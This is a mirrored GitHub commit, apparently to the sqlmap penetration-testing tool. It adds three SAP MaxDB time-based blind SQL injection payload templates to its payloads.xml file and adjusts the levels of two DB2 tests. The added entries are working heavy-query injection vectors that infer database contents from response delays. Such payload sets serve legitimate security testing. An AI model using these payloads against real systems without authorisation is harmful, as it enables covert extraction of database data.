Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit bedf16b

Browse files
stamparmstamparm
committed
adding payloads for time-based injection on SAP MaxDB (heavy query)
1 parent d0490cc commit bedf16b

1 file changed

Lines changed: 62 additions & 4 deletions

File tree

xml/payloads.xml

Lines changed: 62 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -2196,10 +2196,49 @@ Formats:
21962196
</details>
21972197
</test>
21982198

2199+
<test>
2200+
<title>SAP MaxDB AND time-based blind (heavy query)</title>
2201+
<stype>5</stype>
2202+
<level>3</level>
2203+
<risk>2</risk>
2204+
<clause>1,2,3</clause>
2205+
<where>1</where>
2206+
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1, (SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2, (SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
2207+
<request>
2208+
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1, DOMAIN.COLUMNS AS T2, DOMAIN.TABLES AS T3)</payload>
2209+
</request>
2210+
<response>
2211+
<time>[DELAYED]</time>
2212+
</response>
2213+
<details>
2214+
<dbms>SAP MaxDB</dbms>
2215+
</details>
2216+
</test>
2217+
2218+
<test>
2219+
<title>SAP MaxDB AND time-based blind (heavy query - comment)</title>
2220+
<stype>5</stype>
2221+
<level>5</level>
2222+
<risk>2</risk>
2223+
<clause>1,2,3</clause>
2224+
<where>1</where>
2225+
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1, (SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2, (SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
2226+
<request>
2227+
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1, DOMAIN.COLUMNS AS T2, DOMAIN.TABLES AS T3)</payload>
2228+
<comment>--</comment>
2229+
</request>
2230+
<response>
2231+
<time>[DELAYED]</time>
2232+
</response>
2233+
<details>
2234+
<dbms>SAP MaxDB</dbms>
2235+
</details>
2236+
</test>
2237+
21992238
<test>
22002239
<title>DB2 AND time-based blind (heavy query)</title>
22012240
<stype>5</stype>
2202-
<level>2</level>
2241+
<level>3</level>
22032242
<risk>2</risk>
22042243
<clause>1,2,3</clause>
22052244
<where>1</where>
@@ -2234,7 +2273,7 @@ Formats:
22342273
<dbms>DB2</dbms>
22352274
</details>
22362275
</test>
2237-
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
2276+
<!-- TODO: if possible, add payload for Microsoft Access -->
22382277
<!-- End of AND time-based blind tests -->
22392278

22402279

@@ -2416,10 +2455,29 @@ Formats:
24162455
</details>
24172456
</test>
24182457

2458+
<test>
2459+
<title>SAP MaxDB OR time-based blind (heavy query - comment)</title>
2460+
<stype>5</stype>
2461+
<level>4</level>
2462+
<risk>3</risk>
2463+
<clause>1,2,3</clause>
2464+
<where>2</where>
2465+
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1, (SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2, (SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
2466+
<request>
2467+
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1, DOMAIN.COLUMNS AS T2, DOMAIN.TABLES AS T3)</payload>
2468+
</request>
2469+
<response>
2470+
<time>[DELAYED]</time>
2471+
</response>
2472+
<details>
2473+
<dbms>SAP MaxDB</dbms>
2474+
</details>
2475+
</test>
2476+
24192477
<test>
24202478
<title>DB2 OR time-based blind (heavy query)</title>
24212479
<stype>5</stype>
2422-
<level>3</level>
2480+
<level>4</level>
24232481
<risk>3</risk>
24242482
<clause>1,2,3</clause>
24252483
<where>2</where>
@@ -2434,7 +2492,7 @@ Formats:
24342492
<dbms>DB2</dbms>
24352493
</details>
24362494
</test>
2437-
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
2495+
<!-- TODO: if possible, add payload for Microsoft Access -->
24382496
<!-- End of OR time-based blind tests -->
24392497

24402498

0 commit comments

Comments
 (0)